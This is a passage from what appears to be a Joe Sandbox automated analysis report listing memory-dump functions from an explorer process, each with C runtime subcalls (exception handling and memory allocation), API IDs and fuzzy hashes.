                                                                                                                                                                                                                                                      • Part of subcall function 10D7C7F4: _inconsistency.LIBCMT ref: 10D7C80F
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C7F4: _getptd.LIBCMT ref: 10D7C814
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C7F4: _inconsistency.LIBCMT ref: 10D7C830
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 10D8DC97
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 10D8DC9D
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 10D8DCB0
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C884: _getptd.LIBCMT ref: 10D7C88D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction ID: 64757332cccd5143372aaae3d40ccdd0ea54fab9a2f62b368679dc00916f6b8e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1F04F36241A868EC724AF31D8852BC3364EB89B99F0A5426EE495B749DF70D8C1C751
                                                                                                                                                                                                                                                    Function 0F4CDC4A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC7F4: _getptd.LIBCMT ref: 0F4BC801
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC7F4: _inconsistency.LIBCMT ref: 0F4BC80F
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC7F4: _getptd.LIBCMT ref: 0F4BC814
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC7F4: _inconsistency.LIBCMT ref: 0F4BC830
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0F4CDC97
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0F4CDC9D
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0F4CDCB0
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC884: _getptd.LIBCMT ref: 0F4BC88D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction ID: 1239c7969574b015a02aa036036dbb57d7eb289690aa559793060abdebe4198e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AEF0813A5007418ACB609F32C8942AD3364E784B9AF49243EDF595B70ADFA4D4C1C380
                                                                                                                                                                                                                                                    Function 0C37D04A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0C36BBF4: _getptd.LIBCMT ref: 0C36BC01
                                                                                                                                                                                                                                                      • Part of subcall function 0C36BBF4: _inconsistency.LIBCMT ref: 0C36BC0F
                                                                                                                                                                                                                                                      • Part of subcall function 0C36BBF4: _getptd.LIBCMT ref: 0C36BC14
                                                                                                                                                                                                                                                      • Part of subcall function 0C36BBF4: _inconsistency.LIBCMT ref: 0C36BC30
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0C37D097
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0C37D09D
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0C37D0B0
                                                                                                                                                                                                                                                      • Part of subcall function 0C36BC84: _getptd.LIBCMT ref: 0C36BC8D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction ID: de6d45163ad8a3094ad2a86a1b174b37dccc3693ab3f50bc0b8f4fb897ee4182
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EF044762616458ACB34AF32D8882EC3364FB85B59F0C6625DE4E4BB04DF39C585CB51
                                                                                                                                                                                                                                                    Function 0E91DC4A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C7F4: _getptd.LIBCMT ref: 0E90C801
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C7F4: _inconsistency.LIBCMT ref: 0E90C80F
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C7F4: _getptd.LIBCMT ref: 0E90C814
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C7F4: _inconsistency.LIBCMT ref: 0E90C830
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0E91DC97
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E91DC9D
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E91DCB0
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C884: _getptd.LIBCMT ref: 0E90C88D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction ID: edb6544db69476ec71c1f47e7f56e27e74c087e5de05df3bb530a56d040f2c2b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F0313214064989CB24AF35D8942AD23A8E7C5B59F495D61DA495B704DF60C8C5CB41
                                                                                                                                                                                                                                                    Function 0A04D04A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0A03BBF4: _getptd.LIBCMT ref: 0A03BC01
                                                                                                                                                                                                                                                      • Part of subcall function 0A03BBF4: _inconsistency.LIBCMT ref: 0A03BC0F
                                                                                                                                                                                                                                                      • Part of subcall function 0A03BBF4: _getptd.LIBCMT ref: 0A03BC14
                                                                                                                                                                                                                                                      • Part of subcall function 0A03BBF4: _inconsistency.LIBCMT ref: 0A03BC30
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0A04D097
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0A04D09D
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0A04D0B0
                                                                                                                                                                                                                                                      • Part of subcall function 0A03BC84: _getptd.LIBCMT ref: 0A03BC8D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction ID: efbdd7b9db756d66ccae5fc53b20c1970a27f06b5a9e2e71df642e1575d9894c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF0AFF32906498ACB70AF32D8943AC37A8F785B99F081475CA494B706CF30C5C2CB00
                                                                                                                                                                                                                                                    Function 0E8CD04A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BBBF4: _getptd.LIBCMT ref: 0E8BBC01
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BBBF4: _inconsistency.LIBCMT ref: 0E8BBC0F
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BBBF4: _getptd.LIBCMT ref: 0E8BBC14
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BBBF4: _inconsistency.LIBCMT ref: 0E8BBC30
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0E8CD097
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E8CD09D
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E8CD0B0
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BBC84: _getptd.LIBCMT ref: 0E8BBC8D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction ID: 4ba39a733376b21a0eba2b4fc14031bfbd2d35747cef7c51d65f7cce20e10d4d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6F044361516418ACB20AF39D8942AC33A4E786B99F085C39DA49CB749DF31CC86C351
                                                                                                                                                                                                                                                    Function 10D7B910 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _callnewh.LIBCMT ref: 10D7B91E
                                                                                                                                                                                                                                                    • malloc.LIBCMT ref: 10D7B92A
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C28C: _FF_MSGBANNER.LIBCMT ref: 10D7C2BC
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C28C: _NMSG_WRITE.LIBCMT ref: 10D7C2C6
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C28C: HeapAlloc.KERNEL32 ref: 10D7C2E1
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C28C: _callnewh.LIBCMT ref: 10D7C2FA
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C28C: _errno.LIBCMT ref: 10D7C305
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C28C: _errno.LIBCMT ref: 10D7C310
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D7B973
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C34C: RtlPcToFileHeader.NTDLL ref: 10D7C3DB
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C34C: RaiseException.KERNEL32 ref: 10D7C41A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                                                                    • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                                                    • Opcode ID: 9a175b043919fb347f4077bc62570a17eaf2afdc63cec40f233dc0422802633b
                                                                                                                                                                                                                                                    • Instruction ID: 748232e9982590dc04cb22fa143506bb33b16a70c2d7b1127fe03f6f52101af8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a175b043919fb347f4077bc62570a17eaf2afdc63cec40f233dc0422802633b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22F0896960574E51DF248791B441399A350F7443DCF449415DBDD0B768EF7CD245CF10
                                                                                                                                                                                                                                                    Function 0F4BB910 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _callnewh.LIBCMT ref: 0F4BB91E
                                                                                                                                                                                                                                                    • malloc.LIBCMT ref: 0F4BB92A
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC28C: _FF_MSGBANNER.LIBCMT ref: 0F4BC2BC
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC28C: _NMSG_WRITE.LIBCMT ref: 0F4BC2C6
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC28C: HeapAlloc.KERNEL32 ref: 0F4BC2E1
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC28C: _callnewh.LIBCMT ref: 0F4BC2FA
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC28C: _errno.LIBCMT ref: 0F4BC305
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC28C: _errno.LIBCMT ref: 0F4BC310
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4BB973
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC34C: RtlPcToFileHeader.NTDLL ref: 0F4BC3DB
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC34C: RaiseException.KERNEL32 ref: 0F4BC41A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                                                                    • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                                                    • Opcode ID: 9a175b043919fb347f4077bc62570a17eaf2afdc63cec40f233dc0422802633b
                                                                                                                                                                                                                                                    • Instruction ID: 974f00a99c90ed53b4b03cb462d32ec37c94d646f351ab92254bb2764c79abf5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a175b043919fb347f4077bc62570a17eaf2afdc63cec40f233dc0422802633b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6F0545570574B90DE389795B4403E66350E7C4788F88042E8E8D0BB6BEE3CD245CB10
                                                                                                                                                                                                                                                    Function 0C36AD10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _callnewh.LIBCMT ref: 0C36AD1E
                                                                                                                                                                                                                                                    • malloc.LIBCMT ref: 0C36AD2A
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B68C: _FF_MSGBANNER.LIBCMT ref: 0C36B6BC
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B68C: _NMSG_WRITE.LIBCMT ref: 0C36B6C6
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B68C: _callnewh.LIBCMT ref: 0C36B6FA
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B68C: _errno.LIBCMT ref: 0C36B705
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B68C: _errno.LIBCMT ref: 0C36B710
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C36AD73
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _callnewh_errno$ExceptionThrowmalloc
                                                                                                                                                                                                                                                    • String ID: USER32.dll
                                                                                                                                                                                                                                                    • API String ID: 431260796-4180623378
                                                                                                                                                                                                                                                    • Opcode ID: e7dde28b8ac855a23940e5a94cf37f99108310e922a7b377f9c2fd92b3d9ce0c
                                                                                                                                                                                                                                                    • Instruction ID: 1a72afa74c698da98567e5dece8ad635262dc825cd19691e5ead63bc231c76cb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7dde28b8ac855a23940e5a94cf37f99108310e922a7b377f9c2fd92b3d9ce0c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0F082A532178A81EF249750F4507D9A354F785389F8899229A8D0BF6CEF3CD24EEF11
                                                                                                                                                                                                                                                    Function 0E90B910 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _callnewh.LIBCMT ref: 0E90B91E
                                                                                                                                                                                                                                                    • malloc.LIBCMT ref: 0E90B92A
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C28C: _FF_MSGBANNER.LIBCMT ref: 0E90C2BC
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C28C: _NMSG_WRITE.LIBCMT ref: 0E90C2C6
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C28C: HeapAlloc.KERNEL32 ref: 0E90C2E1
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C28C: _callnewh.LIBCMT ref: 0E90C2FA
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C28C: _errno.LIBCMT ref: 0E90C305
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C28C: _errno.LIBCMT ref: 0E90C310
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E90B973
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C34C: RtlPcToFileHeader.NTDLL ref: 0E90C3DB
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C34C: RaiseException.KERNEL32 ref: 0E90C41A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                                                                    • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                                                    • Opcode ID: 9a175b043919fb347f4077bc62570a17eaf2afdc63cec40f233dc0422802633b
                                                                                                                                                                                                                                                    • Instruction ID: e91b9c1330bb44c895958bafecabe78954aa323e3675db08919247c588a63918
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a175b043919fb347f4077bc62570a17eaf2afdc63cec40f233dc0422802633b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F0895570678E65DE24D755F4503555394F7C4388FC40D258A9D0BB98FE3CCA59CF00
                                                                                                                                                                                                                                                    Function 0A03AD10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _callnewh.LIBCMT ref: 0A03AD1E
                                                                                                                                                                                                                                                    • malloc.LIBCMT ref: 0A03AD2A
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B68C: _FF_MSGBANNER.LIBCMT ref: 0A03B6BC
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B68C: _NMSG_WRITE.LIBCMT ref: 0A03B6C6
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B68C: _callnewh.LIBCMT ref: 0A03B6FA
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B68C: _errno.LIBCMT ref: 0A03B705
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B68C: _errno.LIBCMT ref: 0A03B710
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A03AD73
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _callnewh_errno$ExceptionThrowmalloc
                                                                                                                                                                                                                                                    • String ID: USER32.dll
                                                                                                                                                                                                                                                    • API String ID: 431260796-4180623378
                                                                                                                                                                                                                                                    • Opcode ID: e7dde28b8ac855a23940e5a94cf37f99108310e922a7b377f9c2fd92b3d9ce0c
                                                                                                                                                                                                                                                    • Instruction ID: 2261665b3747aeef2e0e651a889429322abf707bb4ab04e46f2e6860de059cc9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7dde28b8ac855a23940e5a94cf37f99108310e922a7b377f9c2fd92b3d9ce0c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFF08267711B8E90EF24AB61F4503A56398F7863C9F481921CA8E0B765EE7DD249CF01
                                                                                                                                                                                                                                                    Function 0E8BAD10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _callnewh.LIBCMT ref: 0E8BAD1E
                                                                                                                                                                                                                                                    • malloc.LIBCMT ref: 0E8BAD2A
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB68C: _FF_MSGBANNER.LIBCMT ref: 0E8BB6BC
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB68C: _NMSG_WRITE.LIBCMT ref: 0E8BB6C6
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB68C: _callnewh.LIBCMT ref: 0E8BB6FA
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB68C: _errno.LIBCMT ref: 0E8BB705
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB68C: _errno.LIBCMT ref: 0E8BB710
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8BAD73
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _callnewh_errno$ExceptionThrowmalloc
                                                                                                                                                                                                                                                    • String ID: USER32.dll
                                                                                                                                                                                                                                                    • API String ID: 431260796-4180623378
                                                                                                                                                                                                                                                    • Opcode ID: ddea80f1db88839a6acb34983e636c0f1ad2fcbeb7b719d9808bce03c152c9fe
                                                                                                                                                                                                                                                    • Instruction ID: ad06f80ecdbe47a863285346d926a957bd0c1c858172b1ea00eadb6703eb46e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddea80f1db88839a6acb34983e636c0f1ad2fcbeb7b719d9808bce03c152c9fe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73F0E965315B8E41DF259755F4543D55394EB85384F4C4C11C94D4B7A4FE7CC949C701
                                                                                                                                                                                                                                                    Function 10D8D8B0 Relevance: 6.3, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D8DE
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C34C: RtlPcToFileHeader.NTDLL ref: 10D7C3DB
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C34C: RaiseException.KERNEL32 ref: 10D7C41A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D901
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D921
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D94A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D96A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
